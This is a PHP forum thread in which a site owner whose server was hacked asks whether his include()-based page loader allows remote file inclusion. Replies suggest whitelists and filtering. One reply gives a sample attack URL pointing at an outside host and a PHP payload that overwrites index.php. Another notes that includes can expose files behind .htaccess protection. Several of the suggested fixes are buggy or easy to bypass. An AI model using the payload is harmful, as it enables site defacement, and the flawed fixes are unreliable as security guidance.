include() security issues?

[chokri]

www.somewebsite.com/pages.php?page=thisPage <-- how pages are called on my website. 

 

my server's been hacked and i'm trying to figure out whether or not it's been through the website or not.  i found out include() poses some security issues.  on my webstats, i've noticed a couple of people trying something like:

www.somewebsite.com/pages.php?page=http://gak-pake.com/mail.txt?

 

when clicking on that link, you get the "page not found" message.  based on my code below, would someone be able to run a random php script thus making my server somehow vunerable?

 

$pageName = $_REQUEST["page"];
$fileName = $pageName.".php";
$contentFileLoc = fileSearch($fileName,getcwd());  //returns null if $fileName is not found
if($contentFileLoc != null) {include($contentFileLoc);}
else {echo "Page not found.  Please refer to the <a href=pages.php?page=Sitemap>sitemap</a>.  Thank you.";}

 

side note: it was suggested i read: http://www.devshed.com/c/a/PHP/PHP-Security-Mistakes/ for php security tips.  would anyone be able to recommend any other sites?

[tarun]

Yep I Could Something Like:

pages.php?page=http://www.h4ck.com/phpinjection

 

The phpinjection.php:

<?php
$entry_line="Ahaha. Hacked by a scipt kiddy.";
$fp = fopen("index.php", "w"); 
fputs($fp, $entry_line); 
fclose($fp); 
?>

 

 

Hmmmm.... Seriously Re-Write Your Code

[per1os]

The best thing to do would be to do a template system, that is not php at all and does not require including a file, at least not from get, or to have a list of the pages IE:

 

<?php
$pageArray = array("sitemap", "index", "contact");
$page = 'index.php'; // default val.
if (isset($_GET['page'])) {
     if (in_array($_GET['page'], $pageArr)) {
          $page = $_GET['page'];
     }
}

include($page);
?>

 

That way you KNOW what is going to be passed to the include and no one can compromise your page/hack into it like tarun just showed you.

[chokri]

my problem is i have a lot of pages.. hence my need for the website to be dynamic.  so my silly question of the day is: could i just write a script to search for all the page names in my directory then place them into an array, or would i actually have to list them manually?

 

another question..

i've been trying to get my webhost to let me use mod_rewrite.  by making my pages appear static, would that help the website become a wee bit more secure?

[per1os]

www.php.net/dir

 

You can use that to gather file names.

 

mod_rewrite may make it more secure but with the way you are doing it some script kiddie will find an exploitation. You should know what is being included, one way you could do instead of having the file names is use regular expressions and do a check for www or http if that is present do not allow that to be included but yea, you also want to make sure the file exists and nothing bad is going to happen, you may even want to disable the remote include files.

 

www.php.net/include  in there you will find something on how to disallow remote files to be included.

[The Little Guy]

if someone were to make a textfile, and you include it from another site, such as like this: http://gak-pake.com/mail.txt

 

Make sure that file is ONLY read in, not executed.

 

Also, if you only want the coming from your site, and you don't want them to come from anywhere else, use something like this, simple but wont allow files from other sites:

 

<?php
function isURL($file){
     return preg_replace("~http://~","",$file);
}
$page = isURL($_GET['page']);
?>

[earnan]

I had the same problem, my ISP caught that the person was cross-site scripting and blocked my account to prevent it.

 

I installed the following code to prevent it (I use pagename or inc in various locations on my page):

 

If (//check to ensure no cross-site scripting in page request
     (preg_match("/http/",$_GET['pagename']) != 0) OR
     (preg_match("/http/",$_GET['inc']) != 0) 
   ) 
{//failed test, send to access denied page
     header ('Location: ' . (my access denied page));
     exit;
}

[Daniel0]

Something like this would do:

 

<?php
$modules = array(
	'home'          => 'home',
	'login'         => 'login',
	'register'      => 'login',
	'lost_password' => 'login',
	'member_list'   => 'members',
);

$module      = empty($_GET['act']) ? 'home' : $_GET['act'];
$module_path = "/var/www/modules/{$module}.module.php";

if(in_array($module,$modules) && @file_exists($module_path))
{
require_once $module_path;
}
else {
die("Could not load module '{$module}'.");
}
?>

[chokri]

okay, please bear with me.. i'm trying to understand when the textfile would get executed.  would it be in the include function? 

 

if that were the case, then i don't see how that is possible in my original code.

example 1: pages.php?page=http://gak-pake.com/mail.txt

my fileSearch() goes through a specific directory (and its subdirectories) looking for http://gak-pake.com/mail.txt.php.  fileSearch() returns null since http://gak-pake.com/mail.txt.php is not found in my directory.  since it's null, then include() is not even used.

 

example 2: pages.php?page=Events

my fileSearch() goes through a specific directory (and its subdirectories) looking for Events.php.  fileSearch() returns the location of Events.php since the file is located in one of my subdirectories.  in this case, include($contentFileLocation) is executed.

 

i just assumed that would be a safeguard..

 

anyway, thank you so much for your help!!  i'm a newbie to php, and just followed the manual to create my code, so my experience is very, very limited.

[per1os]

Post your fileSearch() function, it seems like if you were hacked that there might be an issue with the function. Perhaps it can be "beefed" up for you for security.

[chokri]

example: fileSearch("Events.php","/home/someWebsite/public_html/Content/")

 

function fileSearch($target,$curdirLoc)
{
   $fileFound = false;
   $compfileLoc = null;
   $curDir = scandir($curdirLoc);
   
   foreach($curDir as $curEntry)
   {
      if($curEntry != "." && $curEntry != "..")
      {
         $myLoc = $curdirLoc."/".$curEntry;
         if(is_file($myLoc))
         {
            if(strcmp(substr($curEntry,2),$target) == 0)
            {
               $fileFound = true;
               return $myLoc;
            }
         }
         elseif(is_dir($myLoc))
         {
            $compfileLoc=fileSearch($target,$myLoc);
            if($compfileLoc == true){return $compfileLoc;}
         }
      }
   }
   if(!$fileFound) {return null;}
}

[Daniel0]

Why not just use one of the options people have posted?

[corbin]

I would just do something very simple that doesn't require you to build an array of file names as that could become burdensome if the amount of files ever got huge.

 

<?php
$file = $_GET['file'];
if(get_magic_quotes_gpc()) {
$file = stripslashes($file);
}

$includedirectory = "path/to/your/include/folder/";
$404page = "some/place/to/show/a/message/if/the/file/is/invalid/or/not/found.php";
$a = array("\\", "/");
$file2 = strreplace($a, "", $file);
if($file == $file2 && file_exists($includedirectory.$file)) {
include($includedirectory.$file);
}
else {
include($404page);
}

?>

[chokri]

Why not just use one of the options people have posted?

 

like i posted earlier, page count for my website is high - manually creating an array of page names is not an option.

 

my question today basically was - does my code not inadvertantly do that anyway?  because in order for a file to be read, it would have to be located in one of my directories.  or did i miss something in my code that allows that whole step to be bypassed?

[bagpiperdude90]

hmm... I was doing the same exact thing. [site]/index.php?show=[pagename]

 

I tried telling it to include a page from another site of mine, but it wouldn't show any of the text in there.

 

 

 

Another thing to note, is that if you have any .htaccess password protected areas, you can be smart with the includes and include files inside the .htaccess without logging in. And its simple to find out what the .htaccess directory is... almost certainly it's one of the ones listed in the "robots.txt." file they'll have.

 

Just for the noobs of us who don't know too much.